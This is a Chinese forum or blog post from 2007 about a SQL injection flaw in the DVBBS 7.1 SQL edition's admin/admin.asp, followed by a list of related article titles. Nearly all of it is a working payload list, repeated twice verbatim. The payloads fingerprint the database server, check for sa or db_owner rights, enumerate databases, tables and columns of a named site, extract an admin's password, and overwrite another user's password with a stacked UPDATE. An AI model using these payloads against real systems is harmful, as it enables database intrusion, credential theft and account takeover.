DVBBS7.1 SQL版 跨库漏洞
2007-01-16 00:00
477 查看
漏洞测试环境:DVBBS7.1 SQL
受影响文件
admin/admin.asp
.....
漏洞利用
(select @@version)>0 获得Windows的版本号
and user_name()='dbo' 判断当前系统的连接用户是不是sa
(select user_name())>0 爆当前系统的连接用户
(select db_name())>0 得到当前连接的数据库
(select IS_MEMBER('db_owner')) --查询数据库当前用户权限
(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--
受影响文件
admin/admin.asp
.....
漏洞利用
(select @@version)>0 获得Windows的版本号
and user_name()='dbo' 判断当前系统的连接用户是不是sa
(select user_name())>0 爆当前系统的连接用户
(select db_name())>0 得到当前连接的数据库
(select IS_MEMBER('db_owner')) --查询数据库当前用户权限
(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--
相关文章推荐
- Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
- 对dvbbs7.1 sp1最新savepost.asp漏洞的研究和利用
- dvbbs 8.2 SQL注射漏洞分析
- 最新dvbbs 7.1sql提权得shell
- 不为人知的动网7.1 SQL版注入漏洞(图)(anqn)
- 动网7.1 sp1 sql 博客漏洞
- 动网dvbbs7.1论坛权限提升漏洞及防范(图)
- 不为人知的动网7.1 SQL版注入漏洞
- dvbbs7.1 sql升级笔记
- 某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org
- Sql语句注入漏洞,看看你存在吗
- 转:SQL注入天书 - ASP注入漏洞全接触
- 黑马程序员--ADO.NET学习之SQL注入漏洞攻击
- web安全 XSS、CSRF 漏洞、SQL 注入漏洞,跳转漏洞
- DVBBS 8.2 漏洞利用
- 在有注入漏洞的SQL服务器上运行CMD命令
- PE2006和动网Dvbbs 7.1 sp1和Oblog313整合总结
- Dvbbs 8.2 login_sql注入漏洞探析
- 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令
- php taint检测XSS/SQL/Shell注入漏洞